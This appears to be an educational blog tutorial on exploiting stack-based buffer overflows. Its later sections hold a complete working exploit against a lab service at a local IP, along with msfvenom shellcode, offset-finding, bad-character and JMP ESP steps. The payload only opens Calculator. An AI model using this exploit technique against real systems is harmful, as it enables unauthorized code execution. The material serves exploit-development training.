Understanding & Exploiting Stack-Based Buffer Overflows

Sourov Ghosh
Jan 16, 2020

Overview

Stack-based buffer overflows are probably the best-known and one of the most common ways of remotely taking over the code execution of a process. These exploits were extremely common 20 years ago. Since then, operating system developers, application developers, and hardware manufacturers have put a huge amount of effort into mitigating them, and changes have even been made to the standard libraries developers use.

What is a buffer?

A buffer is a contiguous block of memory. In C, declaring an array allocates a buffer of a fixed size.

Syntax: type array[buffer_length];

Example:

char input[50];      // An array of 50 characters (valid indices are 0 to 49).
char c = input[49];  // The last valid element.
char d = input[250]; // Out of bounds: accesses memory outside the array (undefined behavior).

Memory Layout

Credits: GeeksforGeeks

The Stack

The stack is a region of process memory that works as a LIFO (last in, first out) data structure. The OS allocates a stack for each thread when the thread is created, and releases it when the thread ends. The size of the stack is defined when it is created and does not change.

Source: Wikipedia

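A stack frame is the block of data pushed onto the stack for one function call. On the call stack, a frame holds the function's arguments, its return address, and its local variables. With the common 32-bit x86 calling conventions, the caller pushes the arguments first, the CALL instruction then pushes the return address, and the called function finally saves the old EBP and reserves space for its local variables. Because the stack grows toward lower addresses, a local buffer sits below the saved return address, so writing past the end of the buffer moves toward the return address.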
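To make the layout concrete, here is a minimal Python sketch of the order in which a 32-bit cdecl-style call places items on the stack. The function name frame_layout, the starting ESP value, and the labels are made up for illustration. Real compilers may add padding, saved registers, or stack cookies.

```python
def frame_layout(num_args, local_bytes, esp=0x0012FF00):
    """Return (address, label) pairs in the order they are placed on the stack.

    Assumes a 32-bit cdecl-style call: 4-byte slots, arguments pushed right
    to left, and a stack that grows toward lower addresses.
    """
    layout = []
    for index in reversed(range(num_args)):  # caller pushes the last argument first
        esp -= 4
        layout.append((esp, "arg%d" % index))
    esp -= 4                                 # CALL pushes the return address
    layout.append((esp, "return address"))
    esp -= 4                                 # callee saves the old EBP
    layout.append((esp, "saved EBP"))
    esp -= local_bytes                       # callee reserves space for locals
    layout.append((esp, "locals"))
    return layout


for address, label in frame_layout(num_args=2, local_bytes=64):
    print("0x%08X  %s" % (address, label))
```

The locals end up at the lowest address, so a write that runs past the end of a local buffer climbs toward the saved EBP and then the return address.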

Registers

  • EAX: Accumulator. Used for performing calculations and for storing return values from function calls. Basic operations such as add, subtract, and compare use this general-purpose register.
  • EBX: Base (unrelated to the base pointer). It has no dedicated purpose and can be used to store data.
  • ECX: Counter. Used for iterations; loop and repeat instructions count ECX downward.
  • EDX: Data. An extension of the EAX register that allows more complex calculations (multiply, divide) by holding the extra data those calculations need.
  • ESP: Stack pointer. Points to the top of the stack.
  • EBP: Base pointer. Points to the base of the current stack frame.
  • ESI: Source index. Holds the location of input data.
  • EDI: Destination index. Points to the location where the result of a data operation is stored.
  • EIP: Instruction pointer. Holds the address of the next instruction to execute.

How do we Exploit This?

Credits: Acunetix

When the vulnerable function returns, the saved return address is popped from the stack into EIP, and the program executes whatever instructions are at that address. Since an overflow lets us overwrite the saved return address, we can load any address we choose into EIP. We can therefore place our shellcode on the stack and make EIP point to the start of it, and the program will execute the shellcode.
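The effect can be simulated without touching real memory. The sketch below models one stack frame as a Python bytearray with a hypothetical 64-byte buffer, followed by the saved EBP and the return address. All sizes, addresses, and names are assumptions chosen for illustration, not values from the target application.

```python
import struct

BUF_SIZE = 64              # hypothetical size of the local buffer
RET_OFFSET = BUF_SIZE + 4  # buffer, then 4 bytes of saved EBP, then the return address


def new_frame(return_address):
    """Model a frame as [buffer][saved EBP][return address][caller's data]."""
    frame = bytearray(BUF_SIZE + 8 + 32)
    struct.pack_into("<I", frame, BUF_SIZE, 0x0012FF80)  # made-up saved EBP
    struct.pack_into("<I", frame, RET_OFFSET, return_address)
    return frame


def unchecked_copy(frame, data):
    """Copy data to the start of the buffer without checking BUF_SIZE."""
    frame[:len(data)] = data


def saved_return_address(frame):
    """Read the 32-bit little-endian value that RET would load into EIP."""
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]


frame = new_frame(0x08041000)
unchecked_copy(frame, b"A" * 16)              # fits inside the buffer
print(hex(saved_return_address(frame)))
unchecked_copy(frame, b"A" * (BUF_SIZE + 8))  # runs over saved EBP and the return address
print(hex(saved_return_address(frame)))
```

After the second copy the stored return address consists of four 0x41 bytes, which is the same symptom a debugger shows when a long run of A characters reaches EIP.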

The Actual Hack

  1. Write past the end of the buffer and overwrite the saved return address (and therefore EIP) to crash the program.
  2. Find the offset within the payload at which EIP is overwritten.
  3. Find and remove bad characters.
  4. Find the address of a JMP ESP instruction so that program flow can be redirected to the stack.
  5. Overwrite the saved return address with the address of that JMP ESP instruction.
  6. Generate the shellcode and exploit the program.
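These steps build up to a payload with a fixed layout. A minimal sketch of that layout follows. The name build_payload and its parameters are illustrative, the offset and address are the ones this article arrives at later, and the single 0xCC byte (the x86 INT3 breakpoint opcode) is only a placeholder for real shellcode.

```python
def build_payload(offset, ret, shellcode, nop_count=16, bad_bytes=b"\x00\x0a"):
    """Lay out: padding up to the return address, new return address, NOP sled, shellcode."""
    if len(ret) != 4:
        raise ValueError("ret must be a packed 32-bit address (4 bytes)")
    body = ret + b"\x90" * nop_count + shellcode
    found = sorted(set(body) & set(bad_bytes))
    if found:
        raise ValueError("payload contains bad bytes: %s" % [hex(b) for b in found])
    return b"A" * offset + body


payload = build_payload(146, b"\xbf\x16\x04\x08", b"\xcc")
print(len(payload), payload[146:150].hex())
```

Rejecting bad bytes while the payload is being built is a design choice made here for safety; it catches an unusable return address or shellcode before anything is sent.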

Exploiting

Crashing the program

We create a long string with the command python -c "print('A'*300)" and then send it as input to the server.

Crashed application

We restart the application with Immunity Debugger attached and send the same payload once more. We can see that the application crashed and that the EIP register is overwritten with 41414141 (41 is the hexadecimal ASCII code for A).
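The same test can be scripted. This is a sketch in Python 3, assuming the server reads a newline-terminated line over TCP. The helper names are made up, and the host and port in the closing comment are the lab values used in the scripts later in this article.

```python
import socket


def crash_payload(length=300):
    """Return `length` 'A' bytes followed by a newline."""
    return b"A" * length + b"\n"


def send_line(host, port, payload, timeout=5.0):
    """Send one payload over TCP and return whatever the server answers (may be empty)."""
    with socket.create_connection((host, port), timeout=timeout) as client:
        client.sendall(payload)
        try:
            return client.recv(1024)
        except OSError:
            return b""  # a timeout or reset is likely if the service has crashed


# Example (lab machine only):
# print(send_line("192.168.0.107", 31337, crash_payload()))
```

Four consecutive A bytes read as a 32-bit value give 0x41414141, which is what the debugger shows in EIP.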

Finding Offset

Now that we know we can overwrite the EIP register, we need to find the exact number of bytes in the payload after which EIP gets overwritten. To find this, we use a tool called msf-pattern_create to create a unique, non-repeating string and send it as the payload. After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate the exact offset.

Using pattern_create and pattern_offset to find the offset
EIP register overwritten with the payload generated by pattern_create
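The idea behind the two tools can be sketched in a few lines of Python. This is not the Metasploit implementation: the function names are hypothetical, and the sketch only reproduces the familiar Aa0Aa1Aa2 style of pattern, in which every 4-character window is unique.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Return the first `length` characters of 'Aa0Aa1Aa2...' (at most 20280)."""
    triples = itertools.product(string.ascii_uppercase,
                                string.ascii_lowercase,
                                string.digits)
    needed = (length + 2) // 3  # number of 3-character groups required
    text = "".join("".join(t) for t in itertools.islice(triples, needed))
    return text[:length]


def pattern_offset(eip_value, length):
    """Return the offset of the 4 bytes that ended up in EIP, or -1 if absent."""
    # EIP is read as a number, but the bytes sat in memory in little-endian order.
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


pattern = pattern_create(300)
# Pretend the 4 characters at offset 146 were loaded into EIP.
fake_eip = struct.unpack("<I", pattern[146:150].encode("ascii"))[0]
print(hex(fake_eip), pattern_offset(fake_eip, 300))
```

The offset returned is the number of padding bytes to send before the 4 bytes that should land in EIP.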

Finding bad characters

Certain bytes can cause problems when developing exploits. The null byte (\x00) is almost always considered a bad character because it terminates C strings, so string-copying functions stop at it and truncate the payload. To find bad characters, we add a variable to our code that contains every possible byte value and send it right after the return address. \x00 (NULL) and \x0A (line feed, which ends a line of input) are well-known bad characters, so we remove them before testing and add them to our bad characters list:

import socket

host = "192.168.0.107"
port = 31337
char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
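# 146 bytes of padding reach the saved return address; "BBBB" lands in EIP,
# and the test bytes follow it on the stack.
# latin-1 maps each \xNN escape to exactly one byte (needed on Python 3).
pattern = ("A"*146 + "BBBB" + char + "\n").encode("latin-1")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
# print out what we received
print("Received: {0}".format(data))
client.close() # Close the Connection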

After sending this, we inspect the stack (right-click on the ESP register and select the Follow in Dump option).

We can verify that EIP is under our control
The characters that we have sent as input are all present

Since all the characters we sent are present, we can confirm that there are no bad characters other than \x00 and \x0A. If there were a bad character, it would have been replaced by another byte (such as B0), or the list would have been truncated at that point.

Example of a program with lots of bad characters. Not a part of this exploit.
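The comparison between what was sent and what shows up in the dump can also be automated. The sketch below assumes the bytes following ESP have been copied out of the debugger into a Python bytes object; both function names are hypothetical.

```python
def build_test_bytes(known_bad=b"\x00\x0a"):
    """Every byte value from 0x00 to 0xFF except the ones already known to be bad."""
    return bytes(value for value in range(256) if value not in known_bad)


def first_bad_byte(sent, dumped):
    """Return the first sent byte that is missing or altered in the dump, or None."""
    for index, value in enumerate(sent):
        if index >= len(dumped) or dumped[index] != value:
            return value
    return None


sent = build_test_bytes()
# Simulated dump in which 0x2f was mangled into 0xb0 by the target.
dumped = sent.replace(b"\x2f", b"\xb0")
print(first_bad_byte(sent, dumped))
```

Only the first mismatch is reported because one bad byte can corrupt or cut off everything after it. The usual routine is to add that byte to known_bad, rebuild the test bytes, resend, and repeat until the function returns None.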

Finding JMP ESP

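Now that we control the EIP register, we need to make it point to our data on the stack so that the program starts executing it. After the function returns, ESP points to the data just after the overwritten return address, which is where the rest of our payload sits. A JMP ESP instruction (opcode FF E4) jumps to the address held in ESP, so if we overwrite the return address with the address of a JMP ESP instruction, execution lands on our payload. We can find the location of a JMP ESP instruction in the following ways: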

  1. !mona find -s "\xff\xe4"
  2. !mona jmp -r esp

In this case, two modules satisfy our requirement. We will use the address 0x080416BF in our exploit. Because x86 is little-endian, we have to write the address with its bytes reversed, '\xBF\x16\x04\x08', to use it in our code.
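Both the opcode search and the byte reversal are easy to reproduce in Python. The sketch below is only an illustration with hypothetical function names; mona does far more, such as filtering by module and memory protection. It searches a bytes object for FF E4, packs an address with struct, and checks that the packed address contains no bad characters.

```python
import struct


def pack_address(address):
    """Pack a 32-bit address into the 4 bytes an x86 CPU stores in memory."""
    return struct.pack("<I", address)


def find_opcode(blob, opcode=b"\xff\xe4", base=0):
    """Return base + offset for every occurrence of `opcode` in `blob`."""
    hits = []
    start = blob.find(opcode)
    while start != -1:
        hits.append(base + start)
        start = blob.find(opcode, start + 1)
    return hits


def is_usable(address, bad_bytes=b"\x00\x0a"):
    """An address is only usable if none of its packed bytes is a bad character."""
    return not any(byte in bad_bytes for byte in pack_address(address))


print(pack_address(0x080416BF))
print(is_usable(0x080416BF), is_usable(0x00401000))
```

The second check matters because the return address travels through the same input path as the rest of the payload: an address containing \x00 or \x0A would be cut short before it reached the stack.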

Game Over

We generate shellcode using msfvenom and use the generated shellcode in our final exploit.

msfvenom -p windows/exec -b '\x00\x0A' -f python CMD=calc.exe EXITFUNC=thread

The final exploit code

import socket

host = "192.168.0.107"
port = 31337
#badchar '0x00, 0x0A'
shellcode_calc = ""
shellcode_calc += "\xb8\x3e\x08\xbf\x9c\xdb\xdc\xd9\x74\x24"
shellcode_calc += "\xf4\x5f\x29\xc9\xb1\x31\x31\x47\x13\x03"
shellcode_calc += "\x47\x13\x83\xc7\x3a\xea\x4a\x60\xaa\x68"
shellcode_calc += "\xb4\x99\x2a\x0d\x3c\x7c\x1b\x0d\x5a\xf4"
shellcode_calc += "\x0b\xbd\x28\x58\xa7\x36\x7c\x49\x3c\x3a"
shellcode_calc += "\xa9\x7e\xf5\xf1\x8f\xb1\x06\xa9\xec\xd0"
shellcode_calc += "\x84\xb0\x20\x33\xb5\x7a\x35\x32\xf2\x67"
shellcode_calc += "\xb4\x66\xab\xec\x6b\x97\xd8\xb9\xb7\x1c"
shellcode_calc += "\x92\x2c\xb0\xc1\x62\x4e\x91\x57\xf9\x09"
shellcode_calc += "\x31\x59\x2e\x22\x78\x41\x33\x0f\x32\xfa"
shellcode_calc += "\x87\xfb\xc5\x2a\xd6\x04\x69\x13\xd7\xf6"
shellcode_calc += "\x73\x53\xdf\xe8\x01\xad\x1c\x94\x11\x6a"
shellcode_calc += "\x5f\x42\x97\x69\xc7\x01\x0f\x56\xf6\xc6"
shellcode_calc += "\xd6\x1d\xf4\xa3\x9d\x7a\x18\x35\x71\xf1"
shellcode_calc += "\x24\xbe\x74\xd6\xad\x84\x52\xf2\xf6\x5f"
shellcode_calc += "\xfa\xa3\x52\x31\x03\xb3\x3d\xee\xa1\xbf"
shellcode_calc += "\xd3\xfb\xdb\x9d\xb9\xfa\x6e\x98\x8f\xfd"
shellcode_calc += "\x70\xa3\xbf\x95\x41\x28\x50\xe1\x5d\xfb"
shellcode_calc += "\x15\x0d\xbc\x2e\x63\xa6\x19\xbb\xce\xab"
shellcode_calc += "\x99\x11\x0c\xd2\x19\x90\xec\x21\x01\xd1"
shellcode_calc += "\xe9\x6e\x85\x09\x83\xff\x60\x2e\x30\xff"
shellcode_calc += "\xa0\x4d\xd7\x93\x29\xbc\x72\x14\xcb\xc0"
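ret = '\xBF\x16\x04\x08' # Address of JMP ESP (0x080416BF), packed in little endian
# Padding up to the return address, the JMP ESP address, a NOP sled, then the shellcode.
# latin-1 maps each \xNN escape to exactly one byte (needed on Python 3).
pattern = ("A"*146 + ret + "\x90"*16 + shellcode_calc + "\n").encode("latin-1")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)
print("Received: {0}".format(data))
client.close()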

Now we restart the program and run the exploit code. On our Windows machine, we see that the Calculator application has opened.

References & Resources

  1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md
  3. https://www.fuzzysecurity.com/tutorials/expDev/1.html
  4. https://www.youtube.com/watch?v=qSnPayW6F7U
  5. https://www.geeksforgeeks.org/memory-layout-of-c-program/
  6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
  7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/
